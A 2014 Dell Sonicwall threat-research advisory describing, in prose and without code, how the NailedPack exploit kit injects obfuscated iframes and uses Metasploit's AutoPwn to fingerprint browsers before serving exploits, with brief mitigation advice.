Metasploit modules used by malicious exploit kit in the wild (Sep 12, 2014)
The Dell Sonicwall Threats Research team has discovered an exploit kit which uses Metasploit modules to attack the user system. This kit is identified to be NailedPack. This is a multi-payload exploit kit targeting users based on their browser and operating system.
Infection Cycle:
A legitimate website is infected by injecting an iframe, which redirects the users to malicious server. Injected iframe is obfuscated by using a JavaScript Packer.
After deobfuscation generated iframe redirects users to landing page served on malicious server. Landing page uses AutoPwn Metasploit module rather than the traditional Plugin Detect JavaScript library as used by other Exploit Kits.
 |
 |
| Fig 3 : Obfuscated AutoPwn module | Fig 4 : DeObfuscated AutoPwn module |
Above script identifies the Operating Sytem, Browser and its version and sends this information to server in base64 encoded format.
In response to the above information, server sends an obfuscated javascript which has a list of checks based on which it requests for corresponding exploits.
This pack requests for multiple exploits and on successful exploitation additional malware might be downloaded to the system. During our analysis we did not observe any active payload being served.
Having up to date software will help in mitigating this Exploit Kit. Dell Sonicwall Threats Research team will keep on monitoring this Exploit Kit and add update mitigation signatures as required.
